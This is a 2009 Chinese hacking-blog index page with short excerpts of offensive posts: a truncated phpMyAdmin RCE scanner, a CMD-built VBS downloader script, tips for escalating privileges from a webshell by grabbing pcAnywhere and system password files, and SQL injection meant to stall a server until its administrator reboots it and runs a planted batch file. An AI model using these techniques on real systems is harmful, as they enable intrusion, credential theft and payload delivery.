pmaPWN! - phpMyAdmin Code Injection RCE Scanner &

作者:admin 日期:2009-06-29

程序代码

<?php

$list = array(
'/phpmyadmin/',
'/phpMyAdmin/',

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 62

BHST文章系统漏洞

作者:admin 日期:2009-06-24

作者:Jshell
Blog:http://www.jshell.cn
发布于鸡拔毛IT潮人社区
http://www.jbmao.com
首先说下作者在程序中代码的顺序错误

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 100

CMD下执行VBS下载脚本

作者:admin 日期:2009-06-22

在CMD中一条一条地敲如下语句：
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >down.vbs
echo xPost.Open "GET","http://www.baidu.com/img/logo.gif",0 >>down.vbs
echo xPost.Send() >>down.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>down.vbs

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 78

提升(web)权限终极9技巧

作者:admin 日期:2009-06-16

当我们取得一个webshell时候，下一部要做的就是提升权限
个人总结如下：
1:   C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，得到pcAnywhere密码，登陆
2.C:\WINNT\system32\config\

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 70

便宜企业网V1.0漏洞分析

作者:admin 日期:2009-06-15

QQ:7958600

products.asp 部分代码

<%

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 72

让管理员帮你重启服务器

作者:admin 日期:2009-06-15

有时候，我们通过数据库备份一个批处理到启动菜单后，希望服务器在下次重启时运行我们的批处理。可是我们等啊等，服务器就是不重启，怎么办？让管理员帮我们重启一下吧。呵呵

以下注入代码让服务器停止响应，或响应很慢，要取得更好的效果，请丢到注入点后多执行几次。最终管理员会重新启动服务器。

数字型注入点：

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 85

SQL Injection（SQL注入）介绍及SQL Injection攻击检测工具

作者:admin 日期:2009-06-15

1.关于SQL Injection
迄今为止，我基本没有看到谁写出一篇很完整的文章，或者说很成熟的解决方案（能做到的人肯定很多，问题是没有流传开来，很遗憾）我简单的说几点，希望启发大家思考，起到抛砖引玉的作用

一、SQL Injection的原理
SQL Injection的实现方法和破坏作用有很多，但万变不离其宗，其原理可以概括为一句话：SQL Injection就是向服务器端提交事先准备好的数据，拼凑出攻击者想要的SQL语句，以改变数据库操作执行计划。

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 78